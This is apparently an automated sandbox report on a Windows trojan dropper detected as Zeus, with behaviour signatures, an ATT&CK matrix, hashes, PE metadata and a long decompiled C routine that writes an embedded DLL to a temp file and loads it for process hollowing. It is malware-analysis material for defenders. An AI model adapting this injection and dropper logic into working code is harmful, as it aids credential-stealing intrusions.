Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 1_2_0040A825 SetUnhandledExceptionFilter,1_2_0040A825

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Code function: 1_2_10001000 peagtfosapeh,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread, 1_2_10001000
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Memory written: C:\Users\user\Desktop\yw6At7QnNh.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Memory written: C:\Users\user\Desktop\yw6At7QnNh.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Process created: C:\Users\user\Desktop\yw6At7QnNh.exe 'C:\Users\user\Desktop\yw6At7QnNh.exe'
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Process created: C:\Users\user\Desktop\yw6At7QnNh.exe 'C:\Users\user\Desktop\yw6At7QnNh.exe'
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_0040F7B1 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,3_2_0040F7B1
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 1_2_00401B0C GetLocalTime,GetSystemTime,GetTimeZoneInformation,1_2_00401B0C
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_0040994D GetUserNameExW,3_2_0040994D
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 1_2_00403D2A GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,1_2_00403D2A
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 1_2_00401C01 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,KiUserExceptionDispatcher,1_2_00401C01
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: yw6At7QnNh.exe, 00000002.00000002.205524903.0000000002070000.00000004.00000001.sdmpBinary or memory string: S:(ML;;NRNWNX;;;LW)SeSecurityPrivilegeS:(ML;CIOI;NRNWNX;;;LW)?O?I?Tcabcabinet.dllFCICreateFCIAddFileFCIFlushCabinetFCIDestroybcdfghklmnpqrstvwxzaeiouyGlobal\Local\

Remote Access Functionality:

Contains VNC / remote desktop functionality (version string found)
Source: yw6At7QnNh.exe, 00000002.00000002.205524903.0000000002070000.00000004.00000001.sdmp String found in binary or memory: RFB 003.003
Source: yw6At7QnNh.exe, 00000002.00000002.205524903.0000000002070000.00000004.00000001.sdmp String found in binary or memory: identityAccept-EncodingTEIf-Modified-SinceRFB 003.003
Source: yw6At7QnNh.exe String found in binary or memory: RFB 003.003
Source: yw6At7QnNh.exe String found in binary or memory: RFB 003.003
Source: yw6At7QnNh.exe, 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp String found in binary or memory: identityAccept-EncodingTEIf-Modified-SinceRFB 003.003
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_0040F5E2 socket,bind,closesocket,3_2_0040F5E2
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_0040F304 socket,bind,listen,closesocket,3_2_0040F304

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts 1 | Native API 1 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 11 | System Time Discovery 2 | Remote Desktop Protocol 1 | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
Default Accounts | Scheduled Task/Job | Create Account 1 | Valid Accounts 1 | Obfuscated Files or Information 2 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Input Capture 11 | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Valid Accounts 1 | Access Token Manipulation 11 | Install Root Certificate 1 | Security Account Manager | File and Directory Discovery 1 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Remote Access Software 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Process Injection 211 | Software Packing 22 | NTDS | System Information Discovery 4 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 1 | LSA Secrets | Network Share Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Valid Accounts 1 | Cached Domain Credentials | Security Software Discovery 311 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 1 | DCSync | Virtualization/Sandbox Evasion 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation 11 | Proc Filesystem | Process Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 211 | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
yw6At7QnNh.exe | 81% | Virustotal |
yw6At7QnNh.exe | 61% | Metadefender |
yw6At7QnNh.exe | 92% | ReversingLabs | Win32.Trojan.Zeus
yw6At7QnNh.exe | 100% | Avira | TR/Dropper.Gen
yw6At7QnNh.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\ athefff3h6266cd5fa708f.tmp | 100% | Avira | TR/Agent.hjvc
C:\Users\user\AppData\Local\Temp\ athefff3h6266cd5fa708f.tmp | 5% | Virustotal |
C:\Users\user\AppData\Local\Temp\ athefff3h6266cd5fa708f.tmp | 53% | ReversingLabs | Win32.Trojan.Zeus

Unpacked PE Files

Source | Detection | Scanner | Label
2.2.yw6At7QnNh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1115251
1.2.yw6At7QnNh.exe.10000000.4.unpack | 100% | Avira | TR/Agent.hjvc
3.2.yw6At7QnNh.exe.400000.0.unpack | 100% | Avira | TR/Kazy.MK
3.1.yw6At7QnNh.exe.400000.0.unpack | 100% | Avira | TR/Kazy.MK
1.2.yw6At7QnNh.exe.400000.0.unpack | 100% | Avira | TR/Agent.hjvc

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.google.com/webhp | yw6At7QnNh.exe | false |  | high
http://www.google.com/webhpbcMY.txt | yw6At7QnNh.exe, 00000002.00000002.205524903.0000000002070000.00000004.00000001.sdmp, yw6At7QnNh.exe, 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp | false |  | high

      Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:458121
      Start date:02.08.2021
      Start time:21:04:10
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 3m 52s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:yw6At7QnNh (renamed file extension from none to exe)
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:4
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.bank.troj.evad.winEXE@5/2@0/0
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 78.7% (good quality ratio 73.1%)
      • Quality average: 81.9%
      • Quality standard deviation: 29.7%
      HCA Information:
      • Successful, ratio: 72%
      • Number of executed functions: 25
      • Number of non-executed functions: 150
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Stop behavior analysis, all processes terminated
      Warnings:
      • Exclude process from analysis (whitelisted): svchost.exe

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Temp\ athefff3h6266cd5fa708f.tmp
      Process:C:\Users\user\Desktop\yw6At7QnNh.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):3072
      Entropy (8bit):2.4857544881426725
      Encrypted:false
      SSDEEP:12:etGSGsXpFmGEqIUfIjjObu0Nql2nLEu98DwhKQstDISMhTF0L/x8O6r:etGSB54qIUwnO/AHDw0jukx
      MD5:79460E0544E0DFFE86DD51BBA404A2D3
      SHA1:ED294E22259F0DE6BAC6DD7A701B19B3CDCDA900
      SHA-256:2AFD890122BBA0EED6193476D04266B4A5B7A4DE53CB514BD9EAF4243D9FC973
      SHA-512:E2511BCC767B9EA93D378AA5D3D81A08D39701E9920019C9125BED88CDE1DE02BFABD8A5242710E86B4D20A75A65607DE442772753AB47230DEA4A9BA36F563A
      Malicious:true
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      • Antivirus: Virustotal, Detection: 5%, Browse
      • Antivirus: ReversingLabs, Detection: 53%
      Reputation:low
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.. ... ... ...!... ...3... .I.+... .I.$... .Rich.. .........PE..L....t{N...........!......................... ...............................P....................................... ..L.... ..(............................@....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc..(....@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
      Process:C:\Users\user\Desktop\yw6At7QnNh.exe
      File Type:data
      Category:dropped
      Size (bytes):46
      Entropy (8bit):1.0424600748477153
      Encrypted:false
      SSDEEP:3:/lbON:u
      MD5:89CA7E02D8B79ED50986F098D5686EC9
      SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
      SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
      SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: ........................................user.

      Static File Info

      General

      File type:PE32 executable (GUI) Intel 80386, for MS Windows
      Entropy (8bit):7.5870490062472085
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:yw6At7QnNh.exe
      File size:225792
      MD5:8ba293749c97cbf48f30f02c66d3406d
      SHA1:6a7492a26d0a16320daa2cb187232fc0053f4f5f
      SHA256:e2075b32b9716dc41ef667a74c1ae2c2841a5b9fd3046db0bdcd96c581778253
      SHA512:041e3f65fcb877eb19f5d63cb79d2eb6327ee4b06191a3a4202a736fb6215cd2b2b5c436c081b0165acf2b1b0341c8c551bbf166f8f46ce48fedd7d23ff74049
      SSDEEP:6144:ERAL6uxQIBpPnki+81Rnn1BgUUhgmfwgA3Bfdw+:z4MT+81RnnHLUhgrL3tdw+
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Hs..Hs..Hs..Hs..Ks...o..Gs...l...s..*l..Os..Hs...s...l..[s...u..Is..RichHs..................PE..L...G.{N...................

      File Icon

      Icon Hash:0000000000000000

      Static PE Info

      General

      Entrypoint:0x401c01
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      DLL Characteristics:
      Time Stamp:0x4E7B9D47 [Thu Sep 22 20:40:39 2011 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:0f16db1e18559cc080852e2e8fd0038e

      Entrypoint Preview

      Instruction
      push ebp
      mov ebp, esp
      push FFFFFFFFh
      push 0040C160h
      push 00402C1Ch
      mov eax, dword ptr fs:[00000000h]
      push eax
      mov dword ptr fs:[00000000h], esp
      sub esp, 58h
      push ebx
      push esi
      push edi
      mov dword ptr [ebp-18h], esp
      call dword ptr [0040C0B0h]
      xor edx, edx
      mov dl, ah
      mov dword ptr [0040EFBCh], edx
      mov ecx, eax
      and ecx, 000000FFh
      mov dword ptr [0040EFB8h], ecx
      shl ecx, 08h
      add ecx, edx
      mov dword ptr [0040EFB4h], ecx
      shr eax, 10h
      mov dword ptr [0040EFB0h], eax
      xor esi, esi
      push esi
      call 00007FF708C3611Ah
      pop ecx
      test eax, eax
      jne 00007FF708C3529Ah
      push 0000001Ch
      call 00007FF708C35345h
      pop ecx
      mov dword ptr [ebp-04h], esi
      call 00007FF708C35F5Ah
      call dword ptr [0040C0ACh]
      mov dword ptr [00410A58h], eax
      call 00007FF708C35E18h
      mov dword ptr [0040EF98h], eax
      call 00007FF708C35BC1h
      call 00007FF708C35B03h
      call 00007FF708C3545Ch
      mov dword ptr [ebp-30h], esi
      lea eax, dword ptr [ebp-5Ch]
      push eax
      call dword ptr [0040C0A8h]
      call 00007FF708C35A94h
      mov dword ptr [ebp-64h], eax
      test byte ptr [ebp-30h], 00000001h
      je 00007FF708C35298h
      movzx eax, word ptr [ebp-2Ch]
      jmp 00007FF708C35295h
      push 0000000Ah
      pop eax
      push eax
      push dword ptr [ebp-64h]
      push esi
      push esi
      call dword ptr [0040C0A4h]

      Rich Headers

      Programming Language:
      • [ C ] VS98 (6.0) build 8168
      • [RES] VS98 (6.0) cvtres build 1720
      • [C++] VS98 (6.0) build 8168

      Data Directories

      Name | Virtual Address | Virtual Size | Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd598 | 0x64 | .rdata
      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x29828 | .rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_IAT | 0xc000 | 0x15c | .rdata
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

      Sections

      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
      .text | 0x1000 | 0xa21e | 0xa400 | False | 0.593225990854 | data | 6.56845565551 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      .rdata | 0xc000 | 0x1d40 | 0x1e00 | False | 0.365364583333 | data | 4.48192698758 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .data | 0xe000 | 0x2a6c | 0x1000 | False | 0.281005859375 | data | 3.38536461745 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
      .rsrc | 0x11000 | 0x29828 | 0x29a00 | False | 0.905352618243 | data | 7.80378630892 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

      Resources

      Name | RVA | Size | Type | Language | Country
      RT_ICON | 0x11130 | 0x25a8 | dBase III DBT, version number 0, next free block index 40 | English | United States
      RT_GROUP_ICON | 0x136d8 | 0x14 | data | English | United States
      RT_VERSION | 0x136ec | 0x348 | data | English | United States
      None | 0x13a34 | 0x26df4 | data |  |

      Imports

      DLL | Import
      KERNEL32.dll | GetCurrentThreadId, lstrlenA, CloseHandle, FormatMessageA, lstrcatA, GetUserDefaultLangID, lstrcmpiA, SetFileAttributesA, TerminateProcess, GetCurrentProcess, GetLastError, GetProcAddress, LoadLibraryA, Sleep, GetTickCount, SetStdHandle, ReadFile, IsBadCodePtr, IsBadReadPtr, SetUnhandledExceptionFilter, FlushFileBuffers, SetFilePointer, RaiseException, SetEnvironmentVariableA, CompareStringW, CompareStringA, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, MultiByteToWideChar, GetOEMCP, GetACP, GetCPInfo, IsBadWritePtr, VirtualAlloc, WriteFile, RtlUnwind, GetTimeZoneInformation, GetSystemTime, GetLocalTime, GetModuleHandleA, GetStartupInfoA, GetCommandLineA, GetVersion, ExitProcess, HeapReAlloc, HeapAlloc, HeapSize, HeapFree, UnhandledExceptionFilter, GetModuleFileNameA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, HeapDestroy, HeapCreate, VirtualFree
      USER32.dll | DispatchMessageA, GetSysColor, GetDoubleClickTime, SetDoubleClickTime, GetDesktopWindow, PeekMessageA, IsWindow, IsDialogMessageA, PostMessageA, TranslateMessage, IsDlgButtonChecked, FindWindowA, SetWindowTextA, IsClipboardFormatAvailable, wsprintfA, MessageBoxA, GetClassInfoW, IsWindowEnabled
      comdlg32.dll | GetOpenFileNameA
      SHLWAPI.dll | PathAddBackslashA

      Version Infos

      Description | Data
      LegalCopyright | Copyright 2011
      InternalName | TStub
      FileVersion | 1, 0, 5, 1
      CompanyName | dpjadagef
      PrivateBuild |
      LegalTrademarks |
      Comments |
      ProductName | dpjadagef fddflsnjcjek
      SpecialBuild |
      ProductVersion | 1, 0, 5, 1
      FileDescription | fddflsnjcjek
      OriginalFilename | TStub.exe
      Translation | 0x0409 0x04b0

      Possible Origin

      Language of compilation system | Country where language is spoken
      English | United States

      Network Behavior

      No network behavior found

      Code Manipulations

      System Behavior

      General

      Start time:21:04:57
      Start date:02/08/2021
      Path:C:\Users\user\Desktop\yw6At7QnNh.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\Desktop\yw6At7QnNh.exe'
      Imagebase:0x400000
      File size:225792 bytes
      MD5 hash:8BA293749C97CBF48F30F02C66D3406D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low

      General

      Start time:21:04:57
      Start date:02/08/2021
      Path:C:\Users\user\Desktop\yw6At7QnNh.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\Desktop\yw6At7QnNh.exe'
      Imagebase:0x400000
      File size:225792 bytes
      MD5 hash:8BA293749C97CBF48F30F02C66D3406D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low

      General

      Start time:21:04:58
      Start date:02/08/2021
      Path:C:\Users\user\Desktop\yw6At7QnNh.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\Desktop\yw6At7QnNh.exe'
      Imagebase:0x400000
      File size:225792 bytes
      MD5 hash:8BA293749C97CBF48F30F02C66D3406D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low

      Disassembly

      Code Analysis

        Executed Functions

        C-Code - Quality: 78%
        			E0040105A() {
        				int _v8;
        				long _v12;
        				void* _v16;
        				char _v17;
        				void* _v24;
        				long _v28;
        				char _v32;
        				int _v36;
        				long _v40;
        				int _v44;
        				char _v48;
        				int _v52;
        				int _v56;
        				intOrPtr* _v60;
        				char _v64;
        				intOrPtr _v68;
        				intOrPtr _v72;
        				intOrPtr _v76;
        				intOrPtr _v80;
        				char _v84;
        				intOrPtr _v88;
        				intOrPtr _v92;
        				int _v96;
        				intOrPtr _v100;
        				intOrPtr _v104;
        				int _v108;
        				intOrPtr _v112;
        				intOrPtr _v116;
        				intOrPtr _v120;
        				intOrPtr _v124;
        				long _v128;
        				char _v132;
        				struct tagMSG _v160;
        				intOrPtr _v196;
        				int _v204;
        				int _v208;
        				int _v212;
        				long _v216;
        				CHAR* _v220;
        				intOrPtr _v224;
        				CHAR* _v236;
        				int _v244;
        				struct tagOFNA _v248;
        				struct _WNDCLASSW _v288;
        				void _v587;
        				char _v588;
        				void _v847;
        				char _v848;
        				char _v1108;
        				void _v1627;
        				char _v1628;
        				void* __edi;
        				struct HWND__* _t155;
        				struct HWND__* _t158;
        				int _t166;
        				signed int _t175;
        				signed int _t176;
        				long _t178;
        				long _t180;
        				int _t187;
        				int _t189;
        				void* _t190;
        				void* _t202;
        				intOrPtr* _t206;
        				signed int _t209;
        				long _t212;
        				int _t215;
        				struct HINSTANCE__* _t217;
        				signed int _t238;
        				struct HWND__* _t244;
        				signed int _t247;
        				signed int _t250;
        				signed int _t256;
        				signed int _t261;
        				intOrPtr* _t263;
        				intOrPtr* _t286;
        				void* _t287;
        				void* _t288;
        				signed int _t289;
        				char _t293;
        				signed int _t295;
        				CHAR* _t297;
        				long _t298;
        				intOrPtr* _t299;
        				long _t301;
        				intOrPtr _t302;
        				CHAR* _t303;
        
        				_t250 = 0x40;
        				_v848 = 0;
        				_v1628 = 0;
        				memset( &_v847, 0, _t250 << 2);
        				asm("stosw");
        				asm("stosb");
        				_push(0x4a);
        				memset( &_v1627, 0, 0x81 << 2);
        				asm("stosw");
        				asm("stosb");
        				_v588 = 0;
        				memset( &_v587, 0, 0 << 2);
        				asm("stosw");
        				asm("stosb");
        				if(_v28 == 0) {
        					_v28 = GetSysColor(0x3e8);
        				}
        				_t295 = GetDoubleClickTime();
        				SetDoubleClickTime(_t295 + _t295);
        				_v28 = GetTickCount() * _t295 << 2;
        				_t155 = GetDesktopWindow();
        				_push(1);
        				_push(0);
        				_push(0);
        				_v8 = _t155;
        				_push(_t155);
        				_v16 = 0;
        				_push( &_v160);
        				while(PeekMessageA() != 0 && _v16 < 0xc350) {
        					if(_v32 != 0xffffffff) {
        						_t238 = IsWindow(_v8);
        						__eflags = _t238;
        						if(_t238 == 0) {
        							L9:
        							TranslateMessage( &_v160);
        							DispatchMessageA( &_v160);
        							L10:
        							IsDlgButtonChecked(_v8, 7);
        							_t244 = GetDesktopWindow();
        							_v16 = _v16 + 1;
        							_push(1);
        							_push(0);
        							_push(0);
        							_v8 = _t244;
        							_push(_t244);
        							_push( &_v160);
        							continue;
        						}
        						_t247 = IsDialogMessageA(_v8,  &_v160);
        						__eflags = _t247;
        						if(_t247 != 0) {
        							goto L10;
        						}
        						goto L9;
        					}
        					Sleep(0x64);
        					goto L10;
        				}
        				_t158 = FindWindowA(0, "4rwsl5feha6g446p"); // executed
        				_v8 = _t158;
        				SetWindowTextA(0,  &_v848);
        				_t297 = "GetTempPathA";
        				_t286 = 0x40ef50;
        				do {
        					 *_t286 = GetProcAddress(LoadLibraryA("Kernel32.dll"), _t297);
        					_t286 = _t286 + 4;
        					_t297 =  &(_t297[0x15]);
        					__eflags = _t286 - 0x40ef6c;
        				} while (_t286 < 0x40ef6c);
        				__eflags = 0;
        				_t256 = 0x41;
        				_t287 =  &_v848;
        				memset(_t287, 0, _t256 << 2);
        				_t288 = _t287 + _t256;
        				_v16 = FindResourceA(0, 0x16e, 0x11c);
        				_t166 = IsClipboardFormatAvailable(2);
        				_v28 = _t166;
        				wsprintfA( &_v1628, "%d", _t166);
        				_v24 = LoadResource(0, _v16);
        				_v48 = _v17;
        				_v44 = 0;
        				_v40 = 0;
        				_v36 = 0;
        				_v64 = _v17;
        				_v60 = 0;
        				_v56 = 0;
        				_v52 = 0;
        				_t298 = 0xa;
        				do {
        					_v12 = _t298;
        					E0040162E( &_v48,  &_v12);
        					_t298 = _t298 + 0xa;
        					__eflags = _t298 - 0x186a0;
        				} while (_t298 < 0x186a0);
        				__eflags = _v44;
        				_v12 = 0;
        				if(_v44 != 0) {
        					_t175 = _v40 - _v44;
        					__eflags = _t175;
        					_t176 = _t175 >> 2;
        				} else {
        					_t176 = 0;
        				}
        				E004015CF( &_v64, _t288, _t176,  &_v12);
        				_t178 = _v40;
        				_t289 = _v44;
        				_t299 = _v60;
        				__eflags = _t289 - _t178;
        				_v12 = _t178;
        				if(_t289 == _t178) {
        					L20:
        					_v12 = SizeofResource(0, _v16);
        					_t180 = GetLastError();
        					__eflags = _t180 - 0xc4;
        					if(_t180 == 0xc4) {
        						TerminateProcess(GetCurrentProcess(), _v28);
        					}
        					_v16 = LockResource(_v24);
        					_v244 = _v8;
        					_v220 =  &_v1108;
        					_t261 = 0x16;
        					_v248 = 0x58;
        					_v216 = 0x104;
        					_v236 = "All";
        					_v224 = 1;
        					_v212 = 0;
        					_v1108 = 0;
        					memset( &_v248, 0, _t261 << 2);
        					_v208 = 0;
        					_v204 = 0;
        					_v196 = 0x1800;
        					_t187 = GetOpenFileNameA( &_v248);
        					__eflags = _t187 - 1;
        					if(_t187 == 1) {
        						SetFileAttributesA( &_v1108, 0x80);
        					}
        					_v8 = 0;
        					_t189 = lstrcmpiA( &_v588, "GetTempPathA"); // executed
        					__eflags = _t189;
        					if(_t189 == 0) {
        						__eflags = M0040E0A5; // 0x6d
        						if(__eflags == 0) {
        							MessageBoxA(0, "ecr6f1hda7ehw23grp51", 0, 0);
        						}
        					}
        					_t190 = 0;
        					__eflags = _v12;
        					if(_v12 <= 0) {
        						L31:
        						GetClassInfoW(0, L"BUTTON",  &_v288);
        						GetSysColor(_v288.hbrBackground);
        						GetTempPathA(0x104,  &_v588);
        						GetUserDefaultLangID();
        						PathAddBackslashA( &_v588); // executed
        						lstrcatA( &_v588, " athefff3h6266cd5fa708f.tmp");
        						_push(0);
        						_push(0x80);
        						_t301 = 2;
        						_t202 = CreateFileA( &_v588, 0xc0000000, 0, 0, _t301, ??, ??); // executed
        						_v128 = _t301;
        						_t293 = 1;
        						_v12 = _t202;
        						_t302 = 4;
        						_v132 = _t293;
        						_push(0);
        						_v124 = 3;
        						_v120 = _t302;
        						_v116 = 5;
        						_v112 = 6;
        						_v108 = 7;
        						_v104 = 8;
        						_v100 = 9;
        						_v96 = 0xa;
        						_v92 = 0xb;
        						_v88 = 0xc;
        						_v84 = 0xd;
        						_v80 = 0xe;
        						_v76 = 0xf;
        						_v72 = 0x10;
        						_v68 = 0x11;
        						E004018BC( &_v132,  &_v64);
        						_t206 =  &_v64;
        						_t263 =  &_v132;
        						do {
        							_t206 = _t206 - _t302;
        							_v24 =  *_t263;
        							 *_t263 =  *_t206;
        							_t263 = _t263 + _t302;
        							 *_t206 = _v24;
        							__eflags = _t263 - _t206;
        						} while (_t263 < _t206);
        						do {
        							_v132 = 0;
        							_t209 = E00401841( &_v132,  &_v84);
        							__eflags = _t209;
        						} while (_t209 != 0);
        						WriteFile(_v12, _v16, 0xc00,  &_v28, 0); // executed
        						_t212 = GetLastError();
        						 *0x40ef70 = _t212; // executed
        						FormatMessageA(0x1000, 0, _t212, 0,  &_v1628, 0x64, 0); // executed
        						CloseHandle(_v12);
        						_t215 = IsWindowEnabled(_v24);
        						__eflags = _t215 - _t293;
        						if(_t215 == _t293) {
        							PostMessageA(_v24, 0xa, 0, 0);
        						}
        						_t217 = LoadLibraryA( &_v588); // executed
        						_t303 = "peagtfosapeh";
        						_v24 = lstrlenA(_t303);
        						 *0x40ef74 = GetProcAddress(_t217, _t303);
        						_v28 = GetCurrentThreadId();
